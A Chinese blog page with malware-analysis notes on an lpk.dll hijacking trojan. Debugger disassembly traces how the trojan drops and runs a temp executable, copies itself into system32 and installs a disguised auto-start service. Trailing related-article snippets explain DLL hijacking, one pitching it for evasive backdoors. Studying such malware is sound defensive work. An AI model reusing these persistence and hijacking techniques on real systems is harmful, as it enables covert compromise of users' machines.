lpk.dll 劫持木马
















   1: 100012BD  /$  57            push edi
   2: 100012BE  |.  68 20320010   push lpk_1.10003220                      ; /MutexName = "Distribuijq"
   3: 100012C3  |.  6A 00         push 0x0                                 ; |InitialOwner = FALSE
   4: 100012C5  |.  6A 00         push 0x0                                 ; |pSecurity = NULL
   5: 100012C7  |.  FF15 50200010 call dword ptr ds:[<&KERNEL32.CreateMute>; \CreateMutexA




   1: 10001204  |.  50            push eax                                 ; /Buffer = 0012F610
   2: 10001205  |.  68 04010000   push 0x104                               ; |BufSize = 104 (260.)
   3: 1000120A  |.  FF15 48200010 call dword ptr ds:[<&KERNEL32.GetTempPat>; \GetTempPathW
   4: 10001210  |.  8D85 94FDFFFF lea eax,[local.155]
   5: 10001216  |.  50            push eax                                 ; /TempName = 0012F610
   6: 10001217  |.  56            push esi                                 ; |Unique = 0x0
   7: 10001218  |.  68 C4210010   push lpk_1.100021C4                      ; |Prefix = "hrl"
   8: 1000121D  |.  50            push eax                                 ; |Path = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hrl26.tmp"
   9: 1000121E  |.  FF15 44200010 call dword ptr ds:[<&KERNEL32.GetTempFil>; \GetTempFileNameW
  10: 10001224  |.  56            push esi                                 ; /hTemplateFile = NULL
  11: 10001225  |.  56            push esi                                 ; |Attributes = 0
  12: 10001226  |.  6A 02         push 0x2                                 ; |Mode = CREATE_ALWAYS
  13: 10001228  |.  56            push esi                                 ; |pSecurity = NULL
  14: 10001229  |.  33DB          xor ebx,ebx                              ; |
  15: 1000122B  |.  43            inc ebx                                  ; |
  16: 1000122C  |.  53            push ebx                                 ; |ShareMode = FILE_SHARE_READ
  17: 1000122D  |.  68 00000040   push 0x40000000                          ; |Access = GENERIC_WRITE
  18: 10001232  |.  8D85 94FDFFFF lea eax,[local.155]                      ; |
  19: 10001238  |.  50            push eax                                 ; |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hrl26.tmp"
  20: 10001239  |.  FF15 40200010 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileW


   1: 10001246  |.  56            push esi                                 ; /pOverlapped = NULL
   2: 10001247  |.  8D45 F0       lea eax,[local.4]                        ; |
   3: 1000124A  |.  50            push eax                                 ; |pBytesWritten = 0012F86C
   4: 1000124B  |.  FF75 F8       push [local.2]                           ; |nBytesToWrite = 9A00 (39424.)
   5: 1000124E  |.  8975 F0       mov [local.4],esi                        ; |
   6: 10001251  |.  FF75 F4       push [local.3]                           ; |Buffer = lpk_1.10004094
   7: 10001254  |.  57            push edi                                 ; |hFile = 00000084 (window)
   8: 10001255  |.  FF15 3C200010 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile




   1: 10001281  |.  50            push eax                                 ; /pProcessInfo = 0012F610
   2: 10001282  |.  8D45 9C       lea eax,[local.25]                       ; |
   3: 10001285  |.  50            push eax                                 ; |pStartupInfo = 0012F610
   4: 10001286  |.  56            push esi                                 ; |CurrentDir = NULL
   5: 10001287  |.  56            push esi                                 ; |pEnvironment = NULL
   6: 10001288  |.  56            push esi                                 ; |CreationFlags = 0
   7: 10001289  |.  56            push esi                                 ; |InheritHandles = FALSE
   8: 1000128A  |.  56            push esi                                 ; |pThreadSecurity = NULL
   9: 1000128B  |.  56            push esi                                 ; |pProcessSecurity = NULL
  10: 1000128C  |.  8D85 94FDFFFF lea eax,[local.155]                      ; |
  11: 10001292  |.  50            push eax                                 ; |CommandLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hrl26.tmp"
  12: 10001293  |.  56            push esi                                 ; |ModuleFileName = NULL
  13: 10001294  |.  C745 9C 44000>mov [local.25],0x44                      ; |
  14: 1000129B  |.  895D C8       mov [local.14],ebx                       ; |
  15: 1000129E  |.  FF15 30200010 call dword ptr ds:[<&KERNEL32.CreateProc>; \CreateProcessW



   1: 100012F6  /$  55            push ebp
   2: 100012F7  |.  8BEC          mov ebp,esp
   3: 100012F9  |.  81EC 08020000 sub esp,0x208
   4: 100012FF  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
   5: 10001304  |.  8D85 F8FDFFFF lea eax,[local.130]                      ; |
   6: 1000130A  |.  50            push eax                                 ; |PathBuffer = 0012F6DE
   7: 1000130B  |.  FF35 90320010 push dword ptr ds:[0x10003290]           ; |hModule = 10000000 (lpk_1)
   8: 10001311  |.  FF15 58200010 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameW
   9: 10001317  |.  8D85 F8FDFFFF lea eax,[local.130]
  10: 1000131D  |.  50            push eax                                 ; /Path = "lpk.dll"
  11: 1000131E  |.  FF15 C8200010 call dword ptr ds:[<&SHLWAPI.PathFindFil>; \PathFindFileNameW
  12: 10001324  |.  68 CC210010   push lpk_1.100021CC                      ; /String2 = "lpk.dll"
  13: 10001329  |.  50            push eax                                 ; |String1 = "lpk.dll"
  14: 1000132A  |.  FF15 54200010 call dword ptr ds:[<&KERNEL32.lstrcmpiW>>; \lstrcmpiW





   1: if ( Openkey() )
   2:   {
   3:     ServiceStartTable.lpServiceName = ServiceName;
   4:     ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)sub_4028D0;
   5:     v5 = 0;
   6:     v6 = 0;
   7:     StartServiceCtrlDispatcherA(&ServiceStartTable);
   8:   }
   9:   else
  10:   {
  11:     ServerAndKeyAndCreate(ServiceName, DisplayName, aDistribumgqTra);
  12:     if ( dword_409344 )
  13:     {
  14:       GetTempAndMove();
  15:       ExitProcess(0);
  16:     }
  17:   }





   1: 00402C67  |.  68 A4844000   push hrl1A.004084A4                      ; /String2 = "SYSTEM\CurrentControlSet\Services\"
   2: 00402C6C  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
   3: 00402C6E  |.  66:AB         stos word ptr es:[edi]                   ; |
   4: 00402C70  |.  AA            stos byte ptr es:[edi]                   ; |
   5: 00402C71  |.  8D4424 0C     lea eax,dword ptr ss:[esp+0xC]           ; |
   6: 00402C75  |.  50            push eax                                 ; |String1 = 0012F780
   7: 00402C76  |.  FF15 7C604000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
   8: 00402C7C  |.  8D4C24 08     lea ecx,dword ptr ss:[esp+0x8]
   9: 00402C80  |.  68 24804000   push hrl1A.00408024                      ; /StringToAdd = "Distribuijq"
  10: 00402C85  |.  51            push ecx                                 ; |ConcatString = "SYSTEM\CurrentControlSet\Services\"
  11: 00402C86  |.  FF15 4C604000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; \lstrcatA



   1: 00403B43  |> \FF75 E8       push [local.6]                           ; /FileName = "ADVAPI32.dll"
   2: 00403B46  |.  FF15 58604000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; \LoadLibraryA


   1: 00403C25  |> \FF75 F0       push [local.4]                           ; /ProcNameOrOrdinal = "RegOpenKeyExA"
   2: 00403C28  |.  57            push edi                                 ; |hModule
   3: 00403C29  |.  FF15 64604000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress





   1: 00402DB5  |.  51            push ecx                                 ; /maxlen
   2: 00402DB6  |.  8D85 D8FCFFFF lea eax,[local.202]                      ; |
   3: 00402DBC  |.  50            push eax                                 ; |s2 = "C:\Documents and Settings\Administrator\桌面\hrl1A.tmp"
   4: 00402DBD  |.  8D8D E0FDFFFF lea ecx,[local.136]                                  ; |
   5: 00402DC3  |.  51            push ecx                                             ; |s1 = "C:\WINDOWS\system32"
   6: 00402DC4  |.  FF15 60624000 call dword ptr ds:[<&MSVCRT.strncmp>]                ; \strncmp


   1: v6 = sub_403CC0(0x1Au) + 97;
   2:     v7 = sub_403CC0(0x1Au) + 97;
   3:     v8 = sub_403CC0(0x1Au) + 97;
   4:     v9 = sub_403CC0(0x1Au) + 97;
   5:     v10 = sub_403CC0(0x1Au) + 97;
   6:     v11 = sub_403CC0(0x1Au);
   1: v1 = GetTickCount();

   2:  return v1 * (rand() + 3) % a1;



   1: 00402E3E  |.  68 D4844000   push hrl1A.004084D4                      ; /StringToAdd = "\"
   2: 00402E43  |.  8D85 E0FDFFFF lea eax,[local.136]                      ; |
   3: 00402E49  |.  50            push eax                                 ; |ConcatString = "C:\WINDOWS\system32\icdgae.exe"
   4: 00402E4A  |.  8B1D 4C604000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcat>; |kernel32.lstrcatA
   5: 00402E50  |.  FFD3          call ebx                                 ; \lstrcatA
   6: 00402E52  |.  8D8D 68FCFFFF lea ecx,[local.230]
   7: 00402E58  |.  51            push ecx                                 ; /StringToAdd = "C:\Documents and Settings\Administrator\桌面\hrl1A.tmp"
   8: 00402E59  |.  8D95 E0FDFFFF lea edx,[local.136]                      ; |
   9: 00402E5F  |.  52            push edx                                 ; |ConcatString = 0000000B ???
  10: 00402E60  |.  FFD3          call ebx                                 ; \lstrcatA
  11: 00402E62  |.  56            push esi                                 ; /FailIfExists = FALSE
  12: 00402E63  |.  8D85 E0FDFFFF lea eax,[local.136]                      ; |
  13: 00402E69  |.  50            push eax                                 ; |NewFileName = "C:\WINDOWS\system32\icdgae.exe"
  14: 00402E6A  |.  8D8D D8FCFFFF lea ecx,[local.202]                      ; |
  15: 00402E70  |.  51            push ecx                                 ; |ExistingFileName = "C:\Documents and Settings\Administrator\桌面\hrl1A.tmp"
  16: 00402E71  |.  FF15 88604000 call dword ptr ds:[<&KERNEL32.CopyFileA>>; \CopyFileA



   1: 00402EC3  |.  68 3F000F00   push 0xF003F
   2: 00402EC8  |.  57            push edi
   3: 00402EC9  |.  57            push edi
   4: 00402ECA  |.  FF15 748D4000 call dword ptr ds:[0x408D74]             ;  advapi32.OpenSCManagerA




   1: 0012F4A0   00402F03  /CALL 到 CreateServiceA 来自 hrl1A.00402EFD
   2: 0012F4A4   0015A560  |hManager = 0015A560
   3: 0012F4A8   00408024  |ServiceName = "Distribuijq"
   4: 0012F4AC   00408044  |DisplayName = "Distribuluf Transaction Coordinator Service"
   5: 0012F4B0   000F01FF  |DesiredAccess = SERVICE_ALL_ACCESS
   6: 0012F4B4   00000010  |ServiceType = SERVICE_WIN32_OWN_PROCESS
   7: 0012F4B8   00000002  |StartType = SERVICE_AUTO_START
   8: 0012F4BC   00000000  |ErrorControl = SERVICE_ERROR_IGNORE
   9: 0012F4C0   0012F554  |BinaryPathName = "C:\WINDOWS\system32\xwxnws.exe"
  10: 0012F4C4   00000000  |LoadOrderGroup = NULL
  11: 0012F4C8   00000000  |pTagId = NULL
  12: 0012F4CC   00000000  |pDependencies = NULL
  13: 0012F4D0   00000000  |ServiceStartName = NULL
  14: 0012F4D4   00000000  \Password = NULL




   1: 00402EF4  |.  8B55 0C       mov edx,[arg.2]                          ;  hrl1A.00408044
   2: 00402EF7  |.  52            push edx                                 ;  Distribuluf Transaction Coordinator Service
   3: 00402EF8  |.  8B7D 08       mov edi,[arg.1]                          ;  Distribuijq
   4: 00402EFB  |.  57            push edi                                 ;  hrl1A.00408024
   5: 00402EFC  |.  50            push eax
   6: 00402EFD  |.  FF15 448D4000 call dword ptr ds:[0x408D44]             ;  hrl1A.00403956





   2:     v5 = CreateServiceA(v13, lpServiceName, lpDisplayName, 0xF01FFu, 0x10u, 2u, 0, &Str2, 0, 0, 0, 0, 0);
   3:     v37 = v5;
   4:     if ( !v5 && GetLastError() == 1073 )
   5:     {
   6:       v14 = OpenServiceA(hSCManager, lpServiceName, 0xF01FFu);
   7:       v5 = v14;
   8:       v37 = v14;
   9:       if ( !v14 )
  10:         goto LABEL_11;
  11:       StartServiceA(v14, 0, 0);
  12:     }
  13:     if ( StartServiceA(v5, 0, 0) )
  14:     {
  15:       lstrcpyA(&String1, aSystemCurrentc);
  16:       v12(&String1, lpServiceName);
  17:       RegOpenKeyA(HKEY_LOCAL_MACHINE, &String1, &phkResult);
  18:       v15 = lstrlenA(lpString);
  19:       RegSetValueExA(phkResult, aDescription, 0, 1u, (const BYTE *)lpString, v15);
  20:     }


   1: 00402F55  |.  68 A4844000   push hrl1A.004084A4                      ; /String2 = "SYSTEM\CurrentControlSet\Services\"
   2: 00402F5A  |.  8D8D E4FEFFFF lea ecx,[local.71]                       ; |
   3: 00402F60  |.  51            push ecx                                 ; |String1 = 0012F760
   4: 00402F61  |.  FF15 7C604000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA




   1: 00402588  |.  52            push edx                                 ; /Buffer = 0000000D
   2: 00402589  |.  68 04010000   push 0x104                               ; |BufSize = 104 (260.)
   3: 0040258E  |.  FF15 28604000 call dword ptr ds:[<&KERNEL32.GetTempPat>; \GetTempPathA
   4: 00402594  |.  8D8424 200100>lea eax,dword ptr ss:[esp+0x120]
   5: 0040259B  |.  68 88844000   push hrl1A.00408488                      ; /StringToAdd = "SOFTWARE.LOG"
   6: 004025A0  |.  50            push eax                                 ; |ConcatString = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
   7: 004025A1  |.  FF15 4C604000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; \lstrcatA
   8: 004025A7  |.  8B35 2C604000 mov esi,dword ptr ds:[<&KERNEL32.MoveFil>;  kernel32.MoveFileExA
   9: 004025AD  |.  8D8C24 200100>lea ecx,dword ptr ss:[esp+0x120]
  10: 004025B4  |.  6A 03         push 0x3                                 ; /Flags = REPLACE_EXISTING|COPY_ALLOWED
  11: 004025B6  |.  8D5424 20     lea edx,dword ptr ss:[esp+0x20]          ; |
  12: 004025BA  |.  51            push ecx                                 ; |NewName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
  13: 004025BB  |.  52            push edx                                 ; |ExistingName = "C:\Documents and Settings\Administrator\桌面\hrl1A.exe"
  14: 004025BC  |.  FFD6          call esi                                 ; \MoveFileExA
  15: 004025BE  |.  85C0          test eax,eax
  16: 004025C0  |.  74 0E         je short hrl1A.004025D0
  17: 004025C2  |.  6A 05         push 0x5                                 ; /Flags = REPLACE_EXISTING|DELAY_UNTIL_REBOOT
  18: 004025C4  |.  8D8424 240100>lea eax,dword ptr ss:[esp+0x124]         ; |
  19: 004025CB  |.  6A 00         push 0x0                                 ; |NewName = NULL
  20: 004025CD  |.  50            push eax                                 ; |ExistingName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
  21: 004025CE  |.  FFD6          call esi                                 ; \MoveFileExA



写注册表和服务  重要


402f4b 运行服务

4025ce  movefile居然修改了注册表












时间: 2024-08-07 09:46:07

lpk.dll 劫持木马的相关文章


前言   这是一个比较老的样本了,我是在论坛里面找到的这个样本,文章的作者只是介绍了该木马的方法是通过木马造成的结果来分析的这个木马,然后这里写这个文章是通过从内部来剖析该木马的.如果不对的地方还请各位大神们赐教,不足的地方还希望大家能够给我补充一下.谢谢^_^ dll劫持原理 由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件.首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找.利用这个

dll 劫持

库: AheadLib 输入dll 处填你要劫持的dll 路径. 例如: C:\WINDOWS\system32\lpk.dll 来自为知笔记(Wiz)

C语言/C+游戏编程学习之简单 DLL 劫持,就是这么任性

C语言面向过程编程的语言:C++面向对象编程的语言. 两者有本质的区别,其实是完全不同的两种语言,只不过C++兼容C语言而已. 其中C++则一般看作是对C语言的扩展.因为C语言没有面向对象的语法结构,而当时业界又迫切需要面向对象的编程特性,所以贝尔实验室的开发者就为C语言添加了面向对象的结构.现在C++已经不只是C语言的扩展了,它已经完全可以被看作一种新的编程语言.虽然C语言的特性以及库函数仍然被C++支持,不过C++拥有自己的独立的类库体系,功能相当强大. C/C++的优点在于与底层比较接近,


  一.dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件,又称"应用程序拓展",是软件文件类型.在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中.当我们执行某一个程序时,相应的DLL文件就会被调用.一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件. 如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Wi


0x1:实验背景 看到国外一篇文章,大致描述如下: Hi, There are a dll planting vuln in skype installer. This vuln had been reported to Microsoft but they decided not fix this. Here is the vulnerability details: ------ Skype installer in Windows is open to DLL hijacking. Sky

DLL劫持技术例子: HijackDll

控制台程序:DllLoader Dll加载器,用于动态加载目标Dll,并动态调用目标函数 1 #include <cstdio> 2 #include <windows.h> 3 4 typedef int (*pAdd) (int a, int b); 5 6 int main() 7 { 8 HMODULE hModule = GetModuleHandleA("Dll.dll") != NULL ? GetModuleHandleA("Dll.d


最近在搞内网,需要实现免杀后门,大佬推荐了dll劫持,DLL劫持后,能干很多事情,比如杀软对某些厂商的软件是实行白名单的,你干些敏感操作都是不拦截,不提示的.还有留后门,提权等等.本文主要介绍如何检测dll劫持,以及实例演示. DLL劫持 dll文件是什么? DLL(Dynamic Link Library)文件为动态链接库文件,又称"应用程序拓展",是软件文件类型.在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系


lpk.dll病毒是当下比较流行的一类病毒,而正常系统本身也会存在lpk.dll文件,这足以说明这类病毒的危险性.系统本身的lpk.dll文件位于C:\WINDOWS\system32和C:WINDOWS\system\dllcache目录下.lpk.dll病毒的典型特征是感染存在可执行文件的目录,并隐藏自身,删除后又再生成,当同目录中的exe文件运行时,lpk.dll就会被Windows动态链接,从而激活病毒,进而导致不能彻底清除.已知档案大小就是22016字节,windows XP,1894

